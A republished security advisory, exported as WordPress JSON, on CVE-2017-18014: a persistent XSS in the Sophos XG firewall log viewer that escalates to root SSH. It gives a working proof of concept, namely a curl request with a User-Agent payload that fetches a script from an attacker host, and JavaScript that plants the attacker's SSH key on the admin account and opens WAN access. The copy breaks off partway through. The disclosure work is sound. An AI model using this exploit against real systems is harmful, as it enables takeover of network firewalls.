{"id":11037,"date":"2018-01-08T14:20:13","date_gmt":"2018-01-08T22:20:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/08\/news-4808\/"},"modified":"2018-01-08T14:20:13","modified_gmt":"2018-01-08T22:20:13","slug":"news-4808","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/08\/news-4808\/","title":{"rendered":"SSD Advisory \u2013 Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 08 Jan 2018 06:21:27 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3612\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3612');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an unauthenticated persistent XSS that leads to unauthorized root access found in Sophos XG version 17.<\/p>\n<p>Sophos XG Firewall &#8220;provides unprecedented visibility into your network, users, and applications directly from the all-new control center. You also get rich on-box reporting and the option to add Sophos iView for centralized reporting across multiple firewalls.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Sophos was informed of the vulnerability, their response was:<\/p>\n<ul>\n<li>On December 11th, we both received and acknowledged your submission of the issue<\/li>\n<li>On December 12th, we confirmed the issue and started working on a fix<\/li>\n<li>On December 20th, we released the official fix in XGv17 MR3: <a href=\"https:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-17-0-3-mr3-released<\" rel=\"noopener\" target=\"_blank\">https:\/\/community.sophos.com\/products\/xg-firewall\/b\/xg-blog\/posts\/sfos-17-0-3-mr3-released< <\/a>\/li>\n<li>On December 29th, we finished the automatic distribution of the fix backports to all previous releases of XGv16, v16.5, v17<\/li>\n<li>On December 31st, we published our security advisory with the acknowledgement as per your request: <a href=\"https:\/\/community.sophos.com\/kb\/en-us\/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&#038;elq=1514ab02d2764e8cb73e6b0bdbe7e7be&#038;elqaid=2739&#038;elqat=1&#038;elqCampaignId=27053\" rel=\"noopener\" target=\"_blank\">https:\/\/community.sophos.com\/kb\/en-us\/128024?elqTrackId=3a6db4656f654d65b352f526d26c6a17&#038;elq=1514ab02d2764e8cb73e6b0bdbe7e7be&#038;elqaid=2739&#038;elqat=1&#038;elqCampaignId=27053<\/a><\/li>\n<p><\/a><\/li>\n<\/ul>\n<p>CVE: CVE-2017-18014<br \/> <span id=\"more-3612\"><\/span><br \/> <strong>Vulnerability details<\/strong><br \/> An unauthenticated user can trigger a persistent XSS vulnerability in the WAF log page (Control Center -> Log Viewer -> in the filter option &#8220;Web Server Protection&#8221;) in the webadmin interface which can be used to execute any action that webadmin of the firewall can (creating new user \/  ssh enabling and adding an ssh auth-key etc).<\/p>\n<p>In order to trigger the vulnerability we will demonstrate the following scenario:<\/p>\n<ul>\n<li>Sophos XG Firewall will configured with 3 zones: Trusted, Untrusted, DMZ<\/li>\n<li>A WEB server will be placed in DMZ<\/li>\n<li>The firewall will protect the web server using Web Application Firewall (WAF) with default Sophos recommendation.<\/li>\n<li>An attacker, from Untrusted network, will send a URL request to the web server in DMZ. This cause the injection of the script in the WAF logs page<\/li>\n<li>An admin, from Trusted, will visit WAF log page<\/li>\n<li>The script, without any other interaction or alert, will add an SSH auth-key to admin user and will allow ssh administration from Untrusted.<\/li>\n<li>The attacker will get full root ssh shell<\/li>\n<\/ul>\n<p>The Sophos XG WAF log page will execute the &#8220;User-Agent&#8221; parameter in the POST request.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2.jpg\" data-slb-active=\"1\" data-slb-asset=\"659690422\" data-slb-internal=\"0\" data-slb-group=\"3612\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" class=\"alignnone size-medium wp-image-3615\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-768x432.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-1024x576.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2.jpg 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Proof of Concept<\/strong><br \/> <u>Sophos XG configuration:<\/u><\/p>\n<ul>\n<li>Firewall interface Trusted &#8211; 192.168.10.190 port A<\/li>\n<li>Firewall interface Untrusted &#8211; 192.168.0.192 port B<\/li>\n<li>Firewall interface DMZ &#8211; 192.168.20.190 port C<\/li>\n<\/ul>\n<p><u>Environment<\/u><\/p>\n<ul>\n<li>The Sophos XG Fireweal admin portal will be at https:\/\/192.168.10.190:4444\/webconsole\/webpages\/login.jsp<\/li>\n<li>In Trusted network the Admin PC IP: 192.168.10.191<\/li>\n<li>In DMZ network the &#8220;Webserver&#8221; can be netcat listener at IP: 192.168.20.191<\/li>\n<li>In Unrusted network, the Attacker controlled website IP: 192.168.0.12<\/li>\n<\/ul>\n<p>From the attacker PC create an ssh auth key (empty passphrase):<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a53ee9cb6ff3009920463\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ssh-keygen -t rsa<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0007 seconds] -->  <\/p>\n<p>Then read the pub key &#8211; This key will be used in the attack.<\/p>\n<p>Note that you have to encode part of your key when you insert it in the attack script &#8211; every &#8216;+&#8217; must be replaced with &#8216;%2B&#8217;.<\/p>\n<p>Modify the 17.js script (see below) replacing ===&gt;INSERT-YOUR-PUB-KEY&lt;=== with your pub key <\/p>\n<p>Change Host 17.js to your website.<\/p>\n<p>Now run the follow cURL command, injecting the &#8220;User-Agent&#8221;:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a53ee9cb7003998916336\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> curl &#8220;http:\/\/WEBSERVER.COM&#8221; -H &#8220;Host: 192.168.0.192&#8221; -H &#8220;User-Agent:PERU&lt;i hidden&gt;&lt;iframe onload=&#8221;function JS(){var iH = document.getElementsByTagName(&#8216;head&#8217;)[0];var my = document.createElement(&#8216;script&#8217;);my.type = &#8216;text\/javascript&#8217;;my.src = &#8216;https:\/\/www.AttackerControlledWebsite.COM\/17.js&#8217;;iH.appendChild(my);};JS();&#8221;&gt;&lt;\/iframe&gt;&lt;\/i&gt;peru&#8221;     To trigger the attack, from admin PC, go to the log page (Log Viewer &gt; Web Server Protection) and move mouse over the packet details     Connect to  Sophos XG using ssh from attack PC (username is admin):    &lt;u&gt;17.js&lt;\/u&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7003998916336-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7003998916336-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7003998916336-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7003998916336-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7003998916336-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7003998916336-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7003998916336-7\">7<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7003998916336-1\"><span class=\"crayon-i\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http:\/\/WEBSERVER.COM&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">H<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Host: 192.168.0.192&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">H<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;User-Agent:PERU&lt;i hidden&gt;&lt;iframe onload=&#8221;function JS(){var iH = document.getElementsByTagName(&#8216;head&#8217;)[0];var my = document.createElement(&#8216;script&#8217;);my.type = &#8216;text\/javascript&#8217;;my.src = &#8216;https:\/\/www.AttackerControlledWebsite.COM\/17.js&#8217;;iH.appendChild(my);};JS();&#8221;&gt;&lt;\/iframe&gt;&lt;\/i&gt;peru&#8221;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7003998916336-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7003998916336-3\"><span class=\"crayon-st\">To<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trigger <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-v\">attack<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">admin <\/span><span class=\"crayon-v\">PC<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">go <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">log <\/span><span class=\"crayon-e\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Log <\/span><span class=\"crayon-v\">Viewer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Web <\/span><span class=\"crayon-e\">Server <\/span><span class=\"crayon-v\">Protection<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">move <\/span><span class=\"crayon-e\">mouse <\/span><span class=\"crayon-e\">over <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">packet <\/span><span class=\"crayon-e\">details <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7003998916336-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7003998916336-5\"><span class=\"crayon-e\">Connect <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">Sophos <\/span><span class=\"crayon-e\">XG <\/span><span class=\"crayon-e\">using <\/span><span class=\"crayon-e\">ssh <\/span><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">attack <\/span><span class=\"crayon-e\">PC<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">username <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">admin<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7003998916336-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7003998916336-7\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">u<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">17.js<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">u<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0019 seconds] -->  <\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a53ee9cb7009772174720\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> var iframe1 = document.createElement(&#8216;iframe&#8217;);  iframe1.id = &#8216;peruid&#8217;;  iframe1.style = &#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;;  document.body.appendChild(iframe1);  var iframe2 = document.createElement(&#8216;iframe&#8217;);  iframe2.id = &#8216;peruid2&#8217;;  iframe2.style = &#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;;  document.body.appendChild(iframe2);  var url = window.location.href;  var arr = url.split(&#8216;\/&#8217;);  var IPV = arr[0] + &#8216;\/\/&#8217; + arr[2];  var arr2 = url.split(&#8216;=&#8217;);  var csrf = arr2[2];  var ajax = &#8216;{&#8220;username&#8221;:&#8221;admin&#8221;,&#8221;allowpubkeyauth&#8221;:&#8221;1&#8243;,&#8221;sshkey&#8221;:[&#8220;===&gt;INSERT-YOUR-PUB-KEY&lt;===&#8221;]}&#8217;;  var param = &#8220;csrf=&#8221;+csrf+&#8221;&amp;mode=2501&amp;Event=UPDATE&amp;Entity=PublicKeyAuth&amp;json=&#8221;+ajax+&#8221;&amp;__RequestType=ajax&amp;t=1507131213973&#8221;;  var xhttp = new XMLHttpRequest();  xhttp.open(&#8216;POST&#8217;, IPV+&#8217;\/webconsole\/Controller&#8217;, true);  xhttp.setRequestHeader(&#8220;Content-type&#8221;, &#8220;application\/x-www-form-urlencoded&#8221;);  xhttp.onreadystatechange = function() {  if (xhttp.readyState == 4 &amp;&amp; xhttp.status == 200) {       var doc = document.getElementById(&#8220;peruid&#8221;).contentWindow.document;       doc.open();       doc.write(xhttp.responseText);       doc.close();        }    }  xhttp.send(param);  var ajax2 = &#8216;{&#8220;localaclid&#8221;:[&#8220;LAN#2&#8243;,&#8221;LAN#4&#8243;,&#8221;LAN#6&#8243;,&#8221;LAN#13&#8243;,&#8221;LAN#5&#8243;,&#8221;LAN#9&#8243;,&#8221;LAN#8&#8243;,&#8221;LAN#14&#8243;,&#8221;LAN#10&#8243;,&#8221;LAN#7&#8243;,&#8221;LAN#38&#8243;,&#8221;LAN#23&#8243;,&#8221;LAN#18&#8243;,&#8221;WAN#4&#8243;,&#8221;WAN#10&#8243;,&#8221;WAN#38&#8243;,&#8221;DMZ#10&#8243;,&#8221;DMZ#38&#8243;,&#8221;DMZ#18&#8243;,&#8221;VPN#18&#8243;,&#8221;WiFi#2&#8243;,&#8221;WiFi#4&#8243;,&#8221;WiFi#6&#8243;,&#8221;WiFi#13&#8243;,&#8221;WiFi#5&#8243;,&#8221;WiFi#9&#8243;,&#8221;WiFi#8&#8243;,&#8221;WiFi#14&#8243;,&#8221;WiFi#10&#8243;,&#8221;WiFi#7&#8243;,&#8221;WiFi#38&#8243;,&#8221;WiFi#23&#8243;,&#8221;WiFi#18&#8221;]}&#8217;;  var param2 = &#8220;csrf=&#8221;+csrf+&#8221;&amp;mode=72&amp;json=&#8221;+ajax2+&#8221;&amp;__RequestType=ajax&#8221;;  var xhttp2 = new XMLHttpRequest();  xhttp2.open(&#8216;POST&#8217;, IPV+&#8217;\/webconsole\/Controller&#8217;, true);  xhttp2.setRequestHeader(&#8220;Content-type&#8221;, &#8220;application\/x-www-form-urlencoded&#8221;);  xhttp2.onreadystatechange = function() {  if (xhttp2.readyState == 4 &amp;&amp; xhttp.status == 200) {       var doc = document.getElementById(&#8220;peruid2&#8221;).contentWindow.document;       doc.open();       doc.write(xhttp2.responseText);       doc.close();        }    }  xhttp2.send(param2);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a53ee9cb7009772174720-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a53ee9cb7009772174720-41\">41<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-1\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;iframe&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-2\"><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;peruid&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-3\"><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-4\"><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">iframe1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-5\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;iframe&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-6\"><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;peruid2&#8217;<\/span><span 